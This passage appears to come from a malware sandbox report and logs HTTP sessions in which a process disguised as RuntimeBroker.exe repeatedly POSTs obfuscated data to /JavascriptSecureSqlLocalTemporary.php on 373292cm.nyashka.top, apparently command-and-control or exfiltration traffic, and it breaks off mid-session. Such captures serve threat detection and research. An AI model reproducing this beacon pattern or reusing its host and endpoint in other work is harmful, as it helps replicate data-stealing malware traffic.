                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  82192.168.2.65711737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:24.571412086 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  83192.168.2.65711837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:24.839361906 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:25.192234039 CET1852OUTData Raw: 5f 50 59 57 54 47 54 5c 5b 5f 5a 51 59 52 58 52 57 5f 5d 59 57 5c 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _PYWTGT\[_ZQYRXRW_]YW\SZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-,3(5<# =)=(X<=)\(#"?? 13+)# 0!8&F$.Y/1
                                                                                  Jan 11, 2025 06:44:25.487061024 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:25.618439913 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 25 0e 29 1b 0f 04 26 5d 2f 09 24 33 3a 54 2a 13 2b 5f 2a 3d 32 00 33 3b 3d 15 32 2d 20 54 24 3b 07 58 3f 58 25 08 26 3f 2b 1e 39 34 2b 5d 0c 13 21 06 23 5c 39 05 25 02 28 10 2a 16 0d 16 35 2c 22 59 3f 39 32 08 3e 2c 38 5a 3c 00 24 05 2b 39 36 56 2f 28 29 17 39 09 32 1e 20 04 2b 52 0d 11 24 53 2b 3e 3d 53 2a 10 30 04 36 28 27 5b 27 3d 08 13 26 1c 32 56 27 3a 3c 11 25 0b 21 51 27 0f 29 55 26 3b 31 07 32 01 08 0c 36 32 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %)&]/$3:T*+_*=23;=2- T$;X?X%&?+94+]!#\9%(*5,"Y?92>,8Z<$+96V/()92 +R$S+>=S*06('['=&2V':<%!Q')U&;1262#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  84192.168.2.65711937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:24.963880062 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:25.317275047 CET2544OUTData Raw: 5f 51 5c 57 51 42 54 5c 5b 5f 5a 51 59 56 58 57 57 58 5d 5d 57 5b 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _Q\WQBT\[_ZQYVXWWX]]W[ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./006>$]##>=+=>?=#Z#,3Q4! +_8 0\..&F$.Y/!
                                                                                  Jan 11, 2025 06:44:25.597065926 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:25.764413118 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  85192.168.2.65712037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:25.899003029 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:26.254726887 CET2544OUTData Raw: 5f 50 5c 51 51 47 54 5d 5b 5f 5a 51 59 55 58 55 57 59 5d 59 57 5f 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _P\QQGT][_ZQYUXUWY]YW_ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.. <#-4)[(+>&+;"?442 *)3 X;&F$.Y/-
                                                                                  Jan 11, 2025 06:44:26.530780077 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:26.659113884 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  86192.168.2.65712137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:26.932179928 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:27.287386894 CET2544OUTData Raw: 5f 56 5c 53 54 42 54 5a 5b 5f 5a 51 59 56 58 53 57 5b 5d 58 57 58 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _V\STBTZ[_ZQYVXSW[]XWXS\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.X;#3A#> ^40)<]?..?=77< "8<_;"#%/&F$.Y/!
                                                                                  Jan 11, 2025 06:44:27.581326008 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:27.714564085 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  87192.168.2.65712237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:27.838284016 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:28.192416906 CET2544OUTData Raw: 5f 5c 5c 54 54 41 51 5c 5b 5f 5a 51 59 54 58 50 57 58 5d 53 57 5d 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _\\TTAQ\[_ZQYTXPWX]SW]SX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y/">;41=0]<&<-4#?<#1V*9;\ 05_,.&F$.Y/)
                                                                                  Jan 11, 2025 06:44:28.467413902 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:28.633289099 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  88192.168.2.65712337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:28.757225037 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:29.114123106 CET2544OUTData Raw: 5a 50 59 52 51 40 54 50 5b 5f 5a 51 59 55 58 52 57 5c 5d 5a 57 50 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZPYRQ@TP[_ZQYUXRW\]ZWPS[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-; ;E!=$4V*+=<-!Z?>'X#0!1W+:$ #!,&F$.Y/-
                                                                                  Jan 11, 2025 06:44:29.390260935 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:29.526284933 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:29 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  89192.168.2.65712437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:29.712022066 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:30.067970991 CET2536OUTData Raw: 5a 57 5c 57 54 47 51 5e 5b 5f 5a 51 59 57 58 50 57 5f 5d 5a 57 5d 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZW\WTGQ^[_ZQYWXPW_]ZW]ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.\,$5[+ 0=*>4_<-5?[?Z /R4"/?(" 8&F$.Y/
                                                                                  Jan 11, 2025 06:44:30.347610950 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:30.476257086 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  90192.168.2.65712637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:30.604166031 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:30.957801104 CET2536OUTData Raw: 5a 55 59 54 54 40 54 5b 5b 5f 5a 51 59 57 58 54 57 59 5d 5c 57 5a 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYTT@T[[_ZQYWXTWY]\WZS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._,U85(\#0*=?==](.47,4!$?*<"3&;&F$.Y/)
                                                                                  Jan 11, 2025 06:44:31.243086100 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:31.406116962 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:31 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  91192.168.2.65712737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:30.636059999 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:30.989495039 CET1852OUTData Raw: 5f 53 59 57 54 47 51 5a 5b 5f 5a 51 59 5f 58 52 57 5d 5d 53 57 5d 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _SYWTGQZ[_ZQY_XRW]]SW]SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..#!=?4V)==<(&(.;Z4/V 1#+#Y" 5X8&F$.Y/
                                                                                  Jan 11, 2025 06:44:31.284127951 CET25INHTTP/1.1 100 Continue


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  92192.168.2.65712837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:31.538243055 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:31.895436049 CET2544OUTData Raw: 5f 52 5c 5e 54 45 54 5e 5b 5f 5a 51 59 51 58 51 57 59 5d 52 57 5f 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _R\^TET^[_ZQYQXQWY]RW_SX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..#;@5 X406>=<.+.'#72 Q(*;\ ,&F$.Y/=
                                                                                  Jan 11, 2025 06:44:32.167202950 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:32.335767984 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  93192.168.2.65712937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:32.486602068 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:32.832834959 CET2544OUTData Raw: 5f 55 5c 5f 51 44 51 59 5b 5f 5a 51 59 55 58 5f 57 5a 5d 5c 57 50 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _U\_QDQY[_ZQYUX_WZ]\WPS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-,8!>##5Y=7<-9Z)-( #42 *: #398&F$.Y/-
                                                                                  Jan 11, 2025 06:44:33.114964008 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:33.242477894 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  94192.168.2.65713037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:33.366661072 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:33.723489046 CET2544OUTData Raw: 5f 5d 59 57 51 44 54 5e 5b 5f 5a 51 59 5f 58 5f 57 59 5d 5f 57 58 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _]YWQDT^[_ZQY_X_WY]_WXS[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._,"[476>,X+="<>4#<#S#2#(470)^;&F$.Y/
                                                                                  Jan 11, 2025 06:44:33.994847059 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:34.122253895 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  95192.168.2.65713137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:34.258488894 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:34.614161015 CET2544OUTData Raw: 5a 57 5c 5f 54 40 51 5b 5b 5f 5a 51 59 5f 58 52 57 59 5d 5b 57 59 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZW\_T@Q[[_ZQY_XRWY][WYS_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-,"#70*(^+>)[?<# !8+:? 3*.>&F$.Y/
                                                                                  Jan 11, 2025 06:44:34.903548956 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:35.034363031 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  96192.168.2.65713237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:35.291584969 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:35.645365953 CET2544OUTData Raw: 5f 52 59 52 54 40 51 59 5b 5f 5a 51 59 5f 58 50 57 5f 5d 5f 57 59 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
